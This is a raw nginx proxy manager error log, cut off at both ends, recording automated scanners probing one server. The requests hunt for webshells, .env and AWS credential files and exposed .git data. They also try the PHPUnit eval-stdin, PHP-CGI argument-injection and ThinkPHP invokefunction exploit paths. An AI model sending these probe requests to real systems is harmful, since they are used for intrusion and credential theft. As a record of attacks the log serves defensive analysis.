"/var/www/html/file7.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /file7.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:41 [error] 265#265: *15407 open() "/var/www/html/gifclass.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /gifclass.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:41 [error] 265#265: *15407 open() "/var/www/html/wp-admin/css/colors/midnight/about.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/colors/midnight/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:42 [error] 265#265: *15407 open() "/var/www/html/nox.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /nox.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:42 [error] 265#265: *15407 open() "/var/www/html/file48.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /file48.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:42 [error] 265#265: *15407 open() "/var/www/html/info.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /info.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:42 [error] 265#265: *15407 open() "/var/www/html/class9.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /class9.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:42 [error] 265#265: *15407 open() "/var/www/html/la.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /la.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:42 [error] 265#265: *15407 open() "/var/www/html/bless11.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /bless11.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:43 [error] 265#265: *15407 open() "/var/www/html/ccou.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /ccou.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:43 [error] 265#265: *15407 open() "/var/www/html/ton.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /ton.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:43 [error] 265#265: *15407 open() "/var/www/html/403.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /403.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:43 [error] 265#265: *15407 open() "/var/www/html/file9.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /file9.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:43 [error] 265#265: *15407 open() "/var/www/html/ac.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /ac.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:43 [error] 265#265: *15407 open() "/var/www/html/new4.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /new4.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:43 [error] 265#265: *15407 open() "/var/www/html/pop.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /pop.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:44 [error] 265#265: *15407 open() "/var/www/html/az.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /az.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:44 [error] 265#265: *15407 open() "/var/www/html/xaz.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /xaz.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:44 [error] 265#265: *15407 open() "/var/www/html/up4.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /up4.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:44 [error] 265#265: *15407 open() "/var/www/html/1aa.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /1aa.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:44 [error] 265#265: *15407 open() "/var/www/html/elp.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /elp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:44 [error] 265#265: *15407 open() "/var/www/html/wtz.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wtz.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:45 [error] 265#265: *15407 open() "/var/www/html/galex.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /galex.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:45 [error] 265#265: *15407 open() "/var/www/html/xb.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /xb.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:45 [error] 265#265: *15407 open() "/var/www/html/ova.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /ova.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:45 [error] 265#265: *15407 open() "/var/www/html/vx.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /vx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:45 [error] 265#265: *15407 open() "/var/www/html/rh.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /rh.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:57:12 [error] 266#266: *15444 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.187.35.158, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 14:59:30 [error] 266#266: *15445 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 15:42:08 [error] 270#270: *15515 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.187.35.158, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 15:45:57 [error] 273#273: *15520 open() "/var/www/html/hudson" failed (2: No such file or directory), client: 52.248.43.121, server: localhost-nginx-proxy-manager, request: "GET /hudson HTTP/1.1", host: "91.82.83.208" +2026/01/20 16:01:04 [error] 270#270: *15536 open() "/var/www/html/admin/config.php" failed (2: No such file or directory), client: 102.22.20.125, server: localhost-nginx-proxy-manager, request: "GET /admin/config.php HTTP/1.0", host: "91.82.83.208" +2026/01/20 16:07:12 [error] 270#270: *15548 open() "/var/www/html/login" failed (2: No such file or directory), client: 91.224.92.14, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 16:12:02 [error] 270#270: *15565 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 45.156.87.161, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "91.82.83.208" +2026/01/20 16:30:50 [error] 204#204: *14 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.187.35.158, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 16:38:49 [error] 203#203: *31 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 17:07:29 [error] 209#209: *39 open() "/var/www/html/_next" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "POST /_next HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 17:07:30 [error] 207#207: *40 open() "/var/www/html/api" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "POST /api HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 17:07:30 [error] 207#207: *41 open() "/var/www/html/_next/server" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "POST /_next/server HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 17:07:30 [error] 207#207: *42 open() "/var/www/html/app" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "POST /app HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 17:07:30 [error] 207#207: *43 open() "/var/www/html/api/route" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "POST /api/route HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 17:17:38 [error] 207#207: *55 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.187.35.158, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 17:34:22 [error] 207#207: *725 open() "/var/www/html/.env" failed (2: No such file or directory), client: 185.241.208.170, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/20 17:41:57 [error] 207#207: *736 "/var/www/html/.git/logs/index.html" is not found (2: No such file or directory), client: 185.241.208.170, server: localhost-nginx-proxy-manager, request: "GET /.git/logs/ HTTP/1.1", host: "91.82.83.208" +2026/01/20 17:59:53 [error] 207#207: *775 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 17:59:55 [error] 207#207: *775 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 17:59:56 [error] 207#207: *775 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 17:59:57 [error] 207#207: *775 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 17:59:59 [error] 207#207: *775 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:00 [error] 207#207: *775 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:01 [error] 207#207: *775 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:02 [error] 207#207: *775 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:03 [error] 207#207: *775 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:04 [error] 207#207: *775 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:05 [error] 207#207: *775 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:06 [error] 207#207: *775 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:08 [error] 207#207: *775 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:09 [error] 207#207: *775 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:10 [error] 207#207: *775 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:11 [error] 207#207: *775 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:12 [error] 207#207: *775 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:13 [error] 207#207: *775 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:14 [error] 207#207: *775 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:15 [error] 207#207: *775 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:16 [error] 207#207: *775 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:17 [error] 207#207: *775 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:19 [error] 207#207: *775 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:20 [error] 207#207: *775 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:21 [error] 207#207: *775 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:22 [error] 207#207: *775 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:23 [error] 207#207: *775 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:24 [error] 207#207: *775 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:25 [error] 207#207: *775 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:26 [error] 207#207: *775 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:27 [error] 207#207: *775 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:29 [error] 207#207: *775 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:30 [error] 207#207: *775 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:31 [error] 207#207: *775 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:32 [error] 207#207: *775 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:33 [error] 207#207: *775 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:34 [error] 207#207: *775 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:35 [error] 207#207: *775 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:36 [error] 207#207: *775 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:37 [error] 207#207: *775 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:00:41 [error] 207#207: *775 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 38.55.16.35, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:02:38 [error] 208#208: *779 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.187.35.158, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 18:38:31 [error] 208#208: *838 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:31 [error] 208#208: *839 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:31 [error] 208#208: *840 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:32 [error] 208#208: *841 open() "/var/www/html/admin/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /admin/.env HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:32 [error] 208#208: *842 open() "/var/www/html/.env.example" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env.example HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:32 [error] 208#208: *843 open() "/var/www/html/app_dev.php/_profiler/phpinfo" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /app_dev.php/_profiler/phpinfo HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:32 [error] 208#208: *845 open() "/var/www/html/docs/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /docs/.env HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:32 [error] 208#208: *846 open() "/var/www/html/old/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /old/.env HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:33 [error] 208#208: *847 open() "/var/www/html/.env.local" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env.local HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:33 [error] 208#208: *848 open() "/var/www/html/cms/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /cms/.env HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:34 [error] 207#207: *2336 open() "/var/www/html/new/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /new/.env HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:34 [error] 207#207: *2337 open() "/var/www/html/frontend/web/debug/default/view" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /frontend/web/debug/default/view HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:34 [error] 207#207: *2338 open() "/var/www/html/_static/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /_static/.env HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:34 [error] 207#207: *2339 open() "/var/www/html/download/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /download/.env HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:34 [error] 207#207: *2340 open() "/var/www/html/saas/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /saas/.env HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:34 [error] 207#207: *2341 open() "/var/www/html/.env.json" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env.json HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:35 [error] 207#207: *2342 "/var/www/html/infos/index.html" is not found (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /infos/ HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:35 [error] 207#207: *2343 open() "/var/www/html/apps/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /apps/.env HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:35 [error] 207#207: *2344 open() "/var/www/html/templates/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /templates/.env HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:35 [error] 208#208: *2345 open() "/var/www/html/system/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /system/.env HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:35 [error] 208#208: *2346 open() "/var/www/html/stag/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /stag/.env HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:35 [error] 208#208: *2347 open() "/var/www/html/public_html/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /public_html/.env HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:35 [error] 208#208: *2348 open() "/var/www/html/.env.development" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env.development HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:36 [error] 208#208: *2349 open() "/var/www/html/portal/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /portal/.env HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:36 [error] 208#208: *2350 open() "/var/www/html/project/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /project/.env HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:36 [error] 208#208: *2351 open() "/var/www/html/.aws/credentials" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.aws/credentials HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:36 [error] 208#208: *2352 open() "/var/www/html/app/config/parameters.yml" failed (2: No 